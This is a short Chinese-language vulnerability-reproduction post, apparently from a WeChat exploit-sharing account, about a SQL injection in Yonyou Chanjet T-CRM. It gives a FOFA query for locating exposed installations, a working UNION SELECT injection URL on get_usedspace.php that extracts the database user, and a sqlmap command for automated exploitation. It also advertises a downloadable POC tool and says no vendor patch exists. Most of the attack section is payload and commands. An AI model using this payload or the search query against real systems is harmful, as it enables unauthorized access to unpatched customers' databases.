用友畅捷CRM存在SQL注入漏洞

用友畅捷CRM存在SQL注入漏洞

1. 畅捷CRM简介

微信公众号搜索：南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

用友畅捷通T-CRM是用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作（市场、销售和服务）、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业，以客户为中心，以客户营销为目的，帮助他们“提升营销能力，网罗天下商机”。

2.漏洞描述

畅捷CRM系统存在SQL注入漏洞，攻击者可以利用该漏洞获得网站后台数据库信息，构成信息泄露风险。

3.影响版本

4.fofa 查询语句

title=“畅捷CRM”

5.漏洞复现

漏洞链接：

http://127.0.0.1/webservice/get_usedspace.php?site_id=-999%20UNION%20ALL%20SELECT%20CONCAT(0x7e,0x7e,user(),0x7e,0x7e)--

获取到用户名

用sqlmap.py 跑

python3 "D:\softs\sqlmap\sqlmap.py" -u http://127.0.0.1/webservice/get_usedspace.php?site_id=1

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现21 即可获得该POC工具下载地址：

本次的poc加入了代理功能，方便各位师傅调试。

7.整改意见

目前厂商尚未提供相关漏洞补丁链接，请关注厂商主页及时更新： https://www.chanjet.com/

8.往期回顾